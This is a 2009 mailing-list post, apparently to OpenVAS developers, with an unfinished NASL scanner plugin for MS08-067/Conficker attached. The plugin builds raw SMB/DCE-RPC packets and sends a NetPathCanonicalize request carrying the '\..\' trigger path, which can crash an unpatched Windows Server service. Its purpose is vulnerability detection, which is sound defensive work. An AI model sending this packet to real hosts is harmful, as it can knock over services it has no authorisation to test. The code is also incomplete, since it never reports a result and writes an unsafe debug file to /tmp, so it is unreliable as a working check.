On Tuesday 31 March 2009 13:06:42 Chandrashekhar B wrote: *snip*
> to detect patch condition of MS08-067. The plugin 900055 requires SMB > credentials and verifies if the required hotfix is installed through > Windows Registry and verifying the updated file versions. The plugin 900056 > is a Proof of Concept exploit that tries to crash the server service > (safe_checks has to be disabled). This can work on anonymous login > credentials if the target system allows anonymous login (Windows 2000 by > default allows anonymous login). The plugin checks the RPC response status > of an un-patched system. This is all true, but it doesn't really go far enough since it only looks for the original vulnerability and not Conficker. I started working on a check for Conficker last night and got some way before I noticed a glaring problem, but nothing which at this stage is complete. I've attached the plugin in rough form here if anyone wants to take it up. The problem I've had so far is the lack of support for non-clear-text authentication in the OpenVAS SMB implementation, which is limiting my ability to test here, as I only have 2003/Vista systems to play with. I've diverted to start working on that and will be sending another email shortly to openvas-devel regarding this. Cheers, Tim -- Tim Brown <mailto:[email protected]> <http://www.nth-dimension.org.uk/>
#############################################################################
# Based on the work of Tim Brown <[email protected]> as published
# here, http://www.nth-dimension.org.uk/blog.php?id=72 along with the
# associated NASL from SecPod
#
# Rough, unfinished MS08-067 / Conficker check: authenticates to the target
# over SMB, opens the \srvsvc named pipe on IPC$, binds to the srvsvc RPC
# interface and sends one NetPathCanonicalize request carrying the MS08-067
# trigger path. An unpatched Server service may crash, so the script refuses
# to run while safe_checks is enabled.
#
# NOTE(review): the script never evaluates the final response - it dumps it
# to a file and exits without calling security_hole()/security_note() - so
# as written it reports nothing. Finishing the check means parsing `resp`
# (or detecting the dropped connection) and reporting on that.
############################################################################

if(description)
{
  # NOTE(review): 900056 is the id of the SecPod PoC this script is based on
  # (quoted in the mail above); a separate plugin needs its own id - confirm.
  script_id(900056);
  script_dependencies("secpod_reg_enum.nasl");
  exit(0);
}

include("smb_nt.inc");

# The request below can crash the Server service on an unpatched host, so
# never run it when the scan is configured for safe checks only.
if(safe_checks()){
  exit(0);
}

# SMB credentials and transport port come from the knowledge base
# (populated by the dependency / SMB login plugins).
name = kb_smb_name();
login = kb_smb_login();
pass = kb_smb_password();
domain = kb_smb_domain();
port = kb_smb_transport();

soc = open_sock_tcp(port);
if(!soc){
  exit(0);
}

# Missing credentials degrade to empty strings, i.e. an anonymous/null
# session attempt rather than an abort.
if(!domain) domain = "";
if(!login) login = "";
if(!pass) pass = "";

r = smb_session_request(soc:soc, remote:name);
if(!r)
{
  close(soc);
  exit(0);
}

prot = smb_neg_prot(soc:soc);
if(!prot){
  close(soc);
  exit(0);
}

# Session setup via the smb_nt.inc helper. Per the covering mail this
# implementation only supports clear-text authentication, so hosts that
# refuse it (e.g. 2003/Vista with default policy) stop here with a note
# rather than being tested.
r = smb_session_setup(soc:soc, login:login, password:pass, domain:domain, prot:prot);
if(!r)
{
  close(soc);
  report = string("MS08-067: Failed to perform Clear Text based authentication.");
  security_note(data:report, port:port);
  exit(0);
}

uid = session_extract_uid(reply:r);
if(!uid)
{
  close(soc);
  exit(0);
}

# Tree-connect to IPC$, which is where named pipes such as \srvsvc live.
r = smb_tconx(soc:soc, uid:uid, share:"IPC$", name:name);
if(!r)
{
  close(soc);
  exit(0);
}

tid = tconx_extract_tid(reply:r);
if(!tid)
{
  close(soc);
  exit(0);
}

# Split TID and UID into their little-endian byte pairs; the hand-built SMB
# headers below place the low byte first.
tid_high = tid / 256;
tid_low = tid % 256;
uid_high = uid / 256;
uid_low = uid % 256;

# NT Create AndX (SMB command 0xa2) opening the \srvsvc pipe. The UTF-16LE
# name "\srvsvc" is the tail of the packet. The 4-byte NetBIOS session
# header (length in the last byte) is prepended afterwards.
req = raw_string(0xff, 0x53, 0x4d, 0x42, 0xa2, 0x00, 0x00, 0x00,
                 0x00, 0x08, 0x01, 0xc8, 0x00, 0x00, 0x00, 0x00,
                 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                 tid_low, tid_high, 0xa2, 0x4d, uid_low, uid_high, 0x0b, 0x00,
                 0x18, 0xff, 0x00, 0x00, 0x00, 0x00, 0x0e, 0x00,
                 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                 0x9f, 0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,
                 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                 0x03, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
                 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,
                 0x00, 0x11, 0x00, 0x00, 0x5c, 0x00, 0x73, 0x00,
                 0x72, 0x00, 0x76, 0x00, 0x73, 0x00, 0x76, 0x00,
                 0x63, 0x00, 0x00, 0x00);
req = raw_string(0x00, 0x00, 0x00, (strlen(req)%256)) + req;
send(socket:soc, data:req);
resp = smb_recv(socket:soc, length:4096);
# A reply shorter than 107 bytes cannot be a full NT Create AndX response;
# bail out rather than index into it.
if(strlen(resp) < 107)
{
  close(soc);
  exit(0);
}

# File id of the opened pipe, read straight out of the response at the
# offset the script expects for the FID field.
fid_low = ord(resp[42]);
fid_high = ord(resp[43]);

# Transact (0x25) over \PIPE\ carrying a DCE/RPC bind (packet type 0x0b)
# to the srvsvc interface. The 16 bytes starting 0xc8, 0x4f, 0x32, 0x4b
# are the srvsvc interface UUID (4b324fc8-1670-01d3-1278-5a47bf6ee188)
# and the 16 starting 0x04, 0x5d, 0x88, 0x8a the NDR transfer syntax.
req = raw_string(0xff, 0x53, 0x4d, 0x42, 0x25, 0x00, 0x00, 0x00,
                 0x00, 0x08, 0x01, 0xc8, 0x00, 0x00, 0x00, 0x00,
                 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                 tid_low, tid_high, 0xa2, 0x4d, uid_low, uid_high, 0x0c, 0x00,
                 0x10, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0xb8,
                 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                 0x00, 0x00, 0x00, 0x00, 0x00, 0x52, 0x00, 0x48,
                 0x00, 0x52, 0x00, 0x02, 0x00, 0x26, 0x00, fid_low,
                 fid_high, 0x57, 0x00, 0x00, 0x5c, 0x00, 0x50, 0x00,
                 0x49, 0x00, 0x50, 0x00, 0x45, 0x00, 0x5c, 0x00,
                 0x00, 0x00, 0x05, 0x00, 0x0b, 0x03, 0x10, 0x00,
                 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x05, 0x00,
                 0x00, 0x00, 0xb8, 0x10, 0xb8, 0x10, 0x00, 0x00,
                 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
                 0x01, 0x00, 0xc8, 0x4f, 0x32, 0x4b, 0x70, 0x16,
                 0xd3, 0x01, 0x12, 0x78, 0x5a, 0x47, 0xbf, 0x6e,
                 0xe1, 0x88, 0x03, 0x00, 0x00, 0x00, 0x04, 0x5d,
                 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8,
                 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00,
                 0x00, 0x00);
req = raw_string(0x00, 0x00, 0x00, (strlen(req)%256)) + req;
send(socket:soc, data:req);
# NOTE(review): the bind_ack is read but never checked; a rejected bind
# (bind_nak) would go unnoticed and the next request would be sent anyway.
smb_recv(socket:soc, length:4096);

# NetPathCanonicalize request (srvsvc opnum 0x1f - the 0x1f, 0x00 pair after
# the call id) carrying the MS08-067 trigger path "\..\". This is the packet
# that can crash an unpatched Server service. The UTF-16LE string
# "192.168.153.129" is the server-name argument and is hard-coded -
# presumably the author's lab host; a finished check would derive it from
# the target rather than ship a fixed address.
req = raw_string(0xff, 0x53, 0x4d, 0x42, 0x25, 0x00, 0x00, 0x00,
                 0x00, 0x08, 0x01, 0xc8, 0x00, 0x00, 0x00, 0x00,
                 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                 tid_low, tid_high, 0x00, 0x28, uid_low, uid_high, 0x0d, 0x00,
                 0x10, 0x00, 0x00, 0x7c, 0x00, 0x00, 0x00, 0xb8,
                 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                 0x00, 0x00, 0x00, 0x00, 0x00, 0x52, 0x00, 0x7c,
                 0x00, 0x52, 0x00, 0x02, 0x00, 0x26, 0x00, fid_low,
                 fid_high, 0x83, 0x04, 0x00, 0x5c, 0x00, 0x50, 0x00,
                 0x49, 0x00, 0x50, 0x00, 0x45, 0x00, 0x5c, 0x00,
                 0x00, 0x00, 0x05, 0x00, 0x00, 0x03, 0x10, 0x00,
                 0x00, 0x00, 0x7c, 0x00, 0x00, 0x00, 0x06, 0x00,
                 0x00, 0x00, 0x64, 0x00, 0x00, 0x00, 0x00, 0x00,
                 0x1f, 0x00, 0x00, 0x00, 0x02, 0x00, 0x10, 0x00,
                 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00,
                 0x00, 0x00, 0x31, 0x00, 0x39, 0x00, 0x32, 0x00,
                 0x2E, 0x00, 0x31, 0x00, 0x36, 0x00, 0x38, 0x00,
                 0x2e, 0x00, 0x31, 0x00, 0x35, 0x00, 0x33, 0x00,
                 0x2e, 0x00, 0x31, 0x00, 0x32, 0x00, 0x39, 0x00,
                 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00,
                 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x5c, 0x00,
                 0x2e, 0x00, 0x2e, 0x00, 0x5c, 0x00, 0x00, 0x00,
                 0x00, 0x00, 0x10, 0x27, 0x00, 0x00, 0x01, 0x00,
                 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
                 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
                 0x00, 0x00, 0x01, 0x00, 0x00, 0x00);
# Unlike the two requests above, the NetBIOS length here is a literal 0xce
# instead of strlen(req)%256. It appears to match the payload as written,
# but any edit to the bytes above must update it (or switch to strlen).
req = raw_string(0x00, 0x00, 0x00, 0xce) + req;
send(socket:soc, data:req);
resp = smb_recv(socket:soc, length:1024);
# NOTE(review): debugging leftover - dumps the raw reply to a fixed path in
# a shared temp directory and never inspects it. Writing to a predictable
# name in /tmp from a scanner is unsafe (existing file / symlink there gets
# followed); remove this before use and replace it with actual result
# handling that reports the outcome.
fwrite(file:"/tmp/bah", data:resp);
close(soc);
exit(0);
